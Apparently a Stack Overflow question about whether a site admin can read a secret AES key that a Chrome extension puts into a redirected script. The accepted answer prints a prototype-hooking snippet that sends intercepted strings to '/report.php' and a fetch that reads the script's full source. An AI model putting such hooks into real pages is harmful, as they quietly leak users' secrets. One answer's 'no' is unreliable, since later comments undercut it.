# Is it possible for the admin to get the full sourcecode of my js-file if I redirect a Javascript file to a local modified Javascript file?

Tags: javascript, google-chrome-extension, security

I created a google-chrome-extension which redirects all requests of a javascript-file on a website to a modified version of this file which is on my harddrive.
It works and I do it simplified like this:

```
... redirectUrl: chrome.extension.getURL("modified.js")  ...
```

Modified.js is the same javascript file except that I modified a line in the code.
I changed something that looks like

```
var message = mytext.value;
```

to `var message = aes.encrypt(mytext.value,"mysecretkey");`

My question is now is it possible for the admin of this website where I redirect the javascript-file to modify his webpage that he can obtain "mysecretkey". (The admin knows how my extension works and which line is modified but doesn't know the used key)

Thanks in advance

Answer (score 0, accepted):

**Yes**, the "admin" can read the source code of your code.
Your method is very insecure. There are two ways to read "mysecretkey".

Let's start with the non-trivial one: Get a reference to the source. Examples, assume that your `aes.encrypt` method looks like this:

```
(function() {
    var aes = {encrypt: function(val, key) {
        if (key.indexOf('whatever')) {/* ... */}
    }};
})();
```

Then it can be compromised using:

```
(function(indexOf) {
    String.prototype.indexOf = function(term) {
        if (term !== 'known') (new Image).src = '/report.php?t=' + term;
        return indexOf.apply(this, arguments);
    };
})(String.prototype.indexOf);
```

Many `prototype` methods result in possible leaking, as well as [`arguments.callee`](https://developer.mozilla.org/en-US/docs/JavaScript/Reference/Functions_and_function_scope/arguments/callee). If the "admin" wants to break your code, he'll surely be able to achieve this.

The other method is **much easier to implement**:

```
var x = new XMLHttpRequest();
x.open('GET', '/possiblymodified.js');
x.onload = function() {
    console.log(x.responseText); // Full source code here....
};
x.send();
```

You could replace the `XMLHttpRequest` method, but at this point, you're just playing the cat and mouse game. Whenever you think that you've secured your code, the other will find a way to break it (for instance, using the first described method).

Comment: Thanks for your reply, I didn't think that it is so easy.

Answer (score 0):

Since the admin can control any aspect of the site, they could easily modify `aes.encrypt` to post the second argument to them and then continue as normal. Therefore your secret key would be immediately revealed.

Comment: Sorry, I didn't mention: the admin doesn't have contol over 'aes.encrypt', this javascript library is injected separately by my extension.

Comment: They could still potentially modify it. Anything in variables is accessible, more or less.

Comment: This is the question. It is possible to access the variables, functions and everything. But is it possible to access something which is not stored in a variable. Is it possible to get a function as plaintext using javascript?

Comment: Yes. `functionname.toString()`.

Comment: ah yeah, indeed, and what if I write the code in an anonymous function? Is it possible to do the same to an anonymous function?

Answer (score 0):

No. The Web administrator would have no way of seeing what you set it to before it could get sent to the server where he could see it.

Comment: Yes, of course, but I talk about the admin of the page. He doesn't have access to my computer. I only visit his webpage with my browser.

Comment: Are you asking if he can change it? Or see it? If the page is viewable in a Web browser, and he has access to view that page, then he can see any Javascript code you are feeding that page.

Comment: I ask if he can see it. Can you tell me how he could get the key if it is not stored in a variable?

Comment: Are you familiar with Chrome's debugger? When you want to view the source of Javascript, it shows you the code being used, not the text in a file. If you are setting the variable in any of the code, then you can see that in Chrome's debugger.

Comment: yes, that is true. I can see it in my chrome debugger. But can the admin of the website get the key. He only can modify his website add/change javascript etc. If the admin wants to get the key he has to  get the source of the redirected file because "mysecretkey" is not stored in a variable?

Comment: I think I misunderstood the question. If you are running the Web page and its a change that you are running in your browser only, then no. He cannot get your key. I'll update my answer. For some reason I thought you were trying to hide code thats on the actual site from other people.